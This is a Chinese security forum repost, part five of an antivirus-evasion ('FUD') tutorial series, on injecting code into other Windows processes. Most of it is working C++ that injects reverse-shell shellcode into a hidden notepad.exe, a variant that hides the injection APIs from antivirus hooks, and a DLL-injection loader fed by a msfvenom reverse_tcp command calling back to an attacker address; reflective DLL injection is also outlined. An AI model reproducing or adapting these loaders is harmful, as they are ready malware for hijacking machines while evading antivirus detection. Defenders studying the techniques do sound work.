设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 执行方式免杀之注入(FUD101连载五)
返回列表 发新帖
查看: 1731|回复: 0

执行方式免杀之注入(FUD101连载五)

[复制链接]
wholesome

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2020-7-20 08:53:46 | 显示全部楼层 |阅读模式
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
前言
针对本篇及后续文章中用到的部分技术,我已经写好了相关代码,用于快速生成免杀的可执行程序,源代码放在了(github)[https://github.com/1y0n/AV_Evasion_Tool]上,也可以直接下载编译好的(程序)[https://github.com/1y0n/AV_Evasion_Tool/releases]
工具界面如下:

效果如下:

我们在进行上面的实验时,会遇到一个问题,就是我们所启动的程序一旦被关,那么 shell 就掉了。所以,这一章节我们将学习如何将自己的代码注入到其他进程当中,这样即使我们自己的程序被关,也不会影响后面的操作。而且,注入通常会有不错的免杀效果,也能够增加分析难度。
No.1
线程注入
基本实现
CreateRemoteThread 官方定义为:

https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread
下面是 C++ 调用 CreateRemoteThread 实现基础线程注入的代码:
  1. # include <Windows.h>

  3. int main(){

  5.     unsigned char shellcode[] ="\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
  6. "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
  7. "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
  8. "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
  9. "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
  10. "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
  11. "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
  12. "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
  13. "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
  14. "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
  15. "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
  16. "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
  17. "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
  18. "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
  19. "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
  20. "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
  21. "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x86\x01\x41\x54\x49\x89\xe4"
  22. "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
  23. "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
  24. "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
  25. "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
  26. "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
  27. "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
  28. "\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
  29. "\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
  30. "\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
  31. "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
  32. "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
  33. "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
  34. "\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
  35. "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
  36. "\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
  37. "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
  38. "\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";

  40.     HANDLE processHandle;
  41.     HANDLE remoteThread;
  42.     PVOID remoteBuffer;

  44.     processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(4752));//4752是我刚刚启动的一个notepad.exe进程的pid
  45.     remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
  46.     WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
  47.     remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
  48.     CloseHandle(processHandle);
  49. }

复制代码
查看被注入的notepad.exe,可以看到它建立了一个TCP连接:

这样即使我们关掉了 cmd 窗口,只要这个notepad进程存在,shell也是一直存在的。
优化
自动生成新进程并注入
下面这段代码先是用 CreateProcess 启动了一个隐藏 notepad.exe 进程,并将 shellcode 注入到此进程中。
  1. # include <cstdio>

  3. # include <Windows.h>

  5. int main(){

  7.     unsigned char shellcode[] ="\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
  8. "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
  9. "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
  10. "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
  11. "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
  12. "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
  13. "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
  14. "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
  15. "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
  16. "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
  17. "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
  18. "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
  19. "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
  20. "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
  21. "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
  22. "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
  23. "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x86\x01\x41\x54\x49\x89\xe4"
  24. "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
  25. "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
  26. "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
  27. "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
  28. "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
  29. "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
  30. "\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
  31. "\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
  32. "\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
  33. "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
  34. "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
  35. "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
  36. "\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
  37. "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
  38. "\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
  39. "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
  40. "\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";

  42.     HANDLE processHandle;
  43.     HANDLE remoteThread;
  44.     PVOID remoteBuffer;

  46.     STARTUPINFO si;
  47.     PROCESS_INFORMATION pi;
  48.     memset(&si, 0, sizeof(si));
  49.     si.cb = sizeof(STARTUPINFO);
  50.     si.dwFlags = STARTF_USESHOWWINDOW;
  51.     si.wShowWindow = SW_HIDE; //隐藏要启动的进程

  53.     if(CreateProcess(NULL, (LPSTR)"notepad.exe", NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi))
  54.     {
  55.         processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(GetProcessId(pi.hProcess)));
  56.         remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);

  58.         WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
  59.         remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
  60.         CloseHandle(processHandle);
  61.     }

  63.     else
  64.     {

  66.          printf("failed to start notepad.exe");
  67.     }
  68. }

复制代码
隐藏敏感API

由于有些API可能被重点监控或HOOK,所以我们将用第二章的方法隐藏下列API:

✦CreateProcess

✦OpenProcess

✦VirtualAllocEx

✦WriteProcessMemory

✦CreateRemoteThread
具体我们可以通过 GetModuleHandle + GetProcAddress 的方式隐藏敏感API,同样是启动隐藏进程并注入,代码可以改成下面这样:
  1. # include <cstdio>

  3. # include <Windows.h>

  5. int main(){

  7.     unsigned char shellcode[] ="\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
  8. "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
  9. "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
  10. "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
  11. "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
  12. "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
  13. "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
  14. "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
  15. "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
  16. "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
  17. "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
  18. "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
  19. "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
  20. "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
  21. "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
  22. "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
  23. "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x86\x01\x41\x54\x49\x89\xe4"
  24. "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
  25. "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
  26. "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
  27. "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
  28. "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
  29. "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
  30. "\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
  31. "\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
  32. "\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
  33. "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
  34. "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
  35. "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
  36. "\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
  37. "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
  38. "\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
  39. "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
  40. "\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";

  42.     HANDLE processHandle;
  43.     HANDLE remoteThread;
  44.     PVOID remoteBuffer;

  46.     STARTUPINFO si;
  47.     PROCESS_INFORMATION pi;
  48.     memset(&si, 0, sizeof(si));
  49.     si.cb = sizeof(STARTUPINFO);
  50.     si.dwFlags = STARTF_USESHOWWINDOW;
  51.     si.wShowWindow = SW_HIDE; //隐藏要启动的进程

  53.     //要解决的API:
  54.     //CreateProcess
  55.     //OpenProcess
  56.     //VirtualAllocEx
  57.     //WriteProcessMemory
  58.     //CreateRemoteThread

  60.     typedef  BOOL(WINAPI* CreateProcessB)(
  61.         LPCSTR                lpApplicationName,
  62.         LPSTR                 lpCommandLine,
  63.         LPSECURITY_ATTRIBUTES lpProcessAttributes,
  64.         LPSECURITY_ATTRIBUTES lpThreadAttributes,
  65.         BOOL                  bInheritHandles,
  66.         DWORD                 dwCreationFlags,
  67.         LPVOID                lpEnvironment,
  68.         LPCSTR                lpCurrentDirectory,
  69.         LPSTARTUPINFOA        lpStartupInfo,
  70.         LPPROCESS_INFORMATION lpProcessInformation);



  74.     typedef LPVOID(WINAPI* OpenProcessB)(
  75.         DWORD dwDesiredAccess,
  76.         BOOL  bInheritHandle,
  77. DWORD dwProcessId);



  81.     typedef LPVOID(WINAPI* VirtualAllocExB)(
  82.         HANDLE hProcess,
  83.         LPVOID lpAddress,
  84.         SIZE_T dwSize,
  85.         DWORD  flAllocationType,
  86.         DWORD  flProtect);



  90.     typedef LPVOID(WINAPI* WriteProcessMemoryB)(
  91.         HANDLE  hProcess,
  92.         LPVOID  lpBaseAddress,
  93.         LPCVOID lpBuffer,
  94.         SIZE_T  nSize,
  95.         SIZE_T* lpNumberOfBytesWritten);



  99.     typedef LPVOID(WINAPI* CreateRemoteProcessB)(
  100.         HANDLE                 hProcess,
  101.         LPSECURITY_ATTRIBUTES  lpThreadAttributes,
  102.         SIZE_T                 dwStackSize,
  103.         LPTHREAD_START_ROUTINE lpStartAddress,
  104.         LPVOID                 lpParameter,
  105.         DWORD                  dwCreationFlags,
  106.         LPDWORD                lpThreadId);



  110.     if(CreateProcessB cp = (CreateProcessB)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateProcessA"))
  111.     {
  112.         cp(NULL, (LPSTR)"notepad.exe", NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi);

  114.         OpenProcessB op = (OpenProcessB)GetProcAddress(GetModuleHandle("kernel32.dll"), "OpenProcess");
  115.         processHandle = op(PROCESS_ALL_ACCESS, FALSE, DWORD(GetProcessId(pi.hProcess)));

  117.         VirtualAllocExB vae = (VirtualAllocExB)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAllocEx");
  118.         remoteBuffer = vae(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);

  120.         WriteProcessMemoryB wpm = (WriteProcessMemoryB)GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory");
  121.         wpm(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);

  123.         CreateRemoteProcessB crp = (CreateRemoteProcessB)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateRemoteThread");
  124.         remoteThread = crp(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);

  126.         CloseHandle(processHandle);
  127.     }

  129.     else
  130.     {

  132.          printf("failed to create process");
  133.     }
  134. }

复制代码
效果是一样的:

当然也可以采用动态加载的方式同时隐藏 GetProcAddress 和 GetModuleHandle 。下面各种注入方式都可采用相同的方法,不再赘述。
No.2
DLL注入
DLL 注入技术用起来的时候需要先上传 DLL 到目标的硬盘中,然后运行注入程序进行注入,操作起来比较复杂,并不是我们讨论的重点,所以这一部分我只写了示例代码,通过这些代码了解其大体流程即可,代码没有进行优化,甚至注入的 DLL 也都是 msfvenom 生成的。
首先生成 DLL:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.134.1 LPORT=4444 -f dll > inject.dll
需要注意的是,32位的 DLL 要注入32位的进程,64位同理。因为我的系统是64位的,启动的 notepad 进程是64位的,所以 DLL 需要64位的,下面的注入代码也要编译成 64 位的。
  1. # include<Windows.h>

  3. # include<stdio.h>

  5. int main(){
  6.     HANDLE processHandle;
  7.     PVOID remoteBuffer;
  8.     TCHAR dllPath[] = TEXT("C:\\Users\\www1y\\Desktop\\inject.dll");long dll_size = sizeof(dllPath);
  9.     printf("Injecting DLL to PID: %i\n", 10752);    //10752是刚启动的notepad的pid
  10.     processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(10752));
  11.     remoteBuffer = VirtualAllocEx(processHandle, NULL, dll_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  12.     WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, dll_size, NULL);
  13.     PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
  14.     CreateRemoteThread(processHandle, NULL, 0, threatStartRoutineAddress, remoteBuffer, 0, NULL);
  15.     CloseHandle(processHandle);return 0;
  16. }
复制代码
效果:

No.3
反射DLL注入 RDI
前面说到,DLL 注入会在目标磁盘中留下文件,所以实用性并不强。而反射 DLL 注入技术的出现解决了这个问题,它可以将攻击者的 DLL 注入到指定进程中,但是又不会在目标磁盘中留下文件,所以应用很广泛,在Metasploit、CobaltStrike等工具中均有使用,是此章节讨论的重点之一。
反射 DLL 注入技术是由 Stephen Fewer 最先提出的,其过程如下:
1、使用 RWX 权限打开目标进程,并为 DLL 分配足够大的内存。
2、将 DLL 复制到分配的内存空间中。
3、计算 DLL 中用于执行反射加载的导出的内存偏移量。
4、使用反射性加载器函数的偏移地址作为入口,调用 CreateRemoteThread(或等效的未公开的 API 函数,如 RtlCreateUserThread)开始在远程进程中执行。
5、反射式加载器功能使用适当的 CPU 寄存器查找目标进程的进程环境块(PEB),并使用该寄存器在内存 kernel32.dll 和任何其他所需库中查找地址。
6、解析的 KERNEL32 出口目录中找到所需的 API 功能,如内存地址 LoadLibraryA,GetProcAddress和VirtualAlloc。
7、然后使用这些函数将 DLL(自身)正确加载到内存中,并调用其入口点 DllMain。
Stephen Fewer 将代码放到了Github:
https://github.com/stephenfewer/ReflectiveDLLInjection
以上是免杀时经常遇到的一些注入方式,灵活运用以上方式可以实现不错的免杀与隐藏效果。

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 03:50 , Processed in 0.014483 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表